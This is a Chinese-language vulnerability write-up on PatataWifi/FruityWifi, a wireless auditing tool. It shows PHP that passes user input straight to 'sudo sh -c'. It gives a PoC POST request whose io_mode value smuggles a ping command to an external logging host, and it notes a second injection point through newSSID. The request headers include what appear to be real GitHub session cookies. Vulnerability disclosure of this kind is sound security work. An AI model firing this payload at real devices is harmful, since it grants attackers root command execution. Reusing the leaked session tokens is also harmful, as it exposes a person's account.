FruityWIfi是一款有名的无线安全审计的开源工具,其灵感来自于wifipineapple,目前该工具已经更新到2.4。它能够让用户通过web界面来控制和管理模块,十分方便。FriutyWifi最初的设想是能够在树莓派上使用,但是也可以安装在Debian系列的操作系统上,例如Debian,kali Linux等,甚至可以安装在NetHunter上,在某些移动设备上使用。 详细介绍和使用看这里http://www.freebuf.com/articles/wireless/157559.html

github:https://github.com/PatatasFritas/PatataWifi
issues:https://github.com/PatatasFritas/PatataWifi/issues/1

script/config_iface.php 文件

看这里执行的代码是通过 exec_fruitywifi 函数执行的,这个函数在 functions.php里面,如下代码:

function exec_fruitywifi($exec) {
    $bin_exec = "/usr/bin/sudo";
    exec("$bin_exec sh -c \"$exec\"", $output);
    //exec("$bin_exec sh -c \"$exec\" 2>&1", $output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio)
    //LOG
    $rs = fopen(LOGPATH."/exec.log", 'a');
    fwrite($rs, date("Y-m-d H:i:s")." - "."$bin_exec sh -c \"$exec\"\n");
    if(is_array($output) and array_key_exists(0, $output)) {
        fwrite($rs, "\t".$output[0]."\n\n");
    } elseif (is_string($output)) {
        fwrite($rs, "\t".$output."\n\n");
    }
    fclose($rs);
    return $output;
}

可以看到使用exec直接拼接执行了代码。

poc如下:

POST /script/config_iface.php HTTP/1.1
Host: 192.168.8.150
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1305686839.1530540055; _octo=GH1.1.1160558809.1530540055; tz=Asia%2FShanghai; user_session=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; __Host-user_session_same_site=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; logged_in=yes; dotcom_user=ly55521; has_recent_activity=1; _gh_sess=MWl5N0NXckk5ekF0TTEzQXEwYUZaMVdaOGFDdWVjbitiMTFqNzJXK0piNmpLTlg4OTJRMHVhQUJrVHRVenNlQ09aUnBIaFJyN2JoNmFBZXdJK1ZVMzRqQXRBTjlRZzdSVFcydUIrTWtrMHhnaWUzRjJlQk9yVGpTSkdkcVJncDh3a0tRR0pWVWlMNkw5Q2QxLzY2T3JDbEo2b1FjTm90WHB0MS94bHNJYmNZTHhaYmllNzMySEVDZWxtTUxYNCtKQzlqRjRVWlJvOUJ5cFFKL3RLRGRpak1rdGZva2M5SnVDekt6N1JpSmVpdHVGMy9aMTFJbkk1eDlnUXAvNm5CTTVjS1dqSmlUbHFhTXc4WExyWnZuQTFXcnBpMHA1OEp3VnBGdWlMSWtTWVk9LS1VTDViV1pMeFNMaGxMUE5lWDg5M1FRPT0%3D--ec33e4803fc050592008c1eebd9fb22483774002
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

io_mode=123%26'%600%26ping%203.t00ls.fc7853eedebcc14a39700d54c9b8acca.tu4.org.%26%60'

可以收到ping请求。

再看 page_config.php 文件的 82/84行,同样存在命令执行漏洞。

$hostapd_ssid=$_POST['newSSID'];
exec_fruitywifi("sed -i 's/hostapd_ssid=.*/hostapd_ssid=\\\"".$_POST['newSSID']."\\\";/g' ./config/config.php");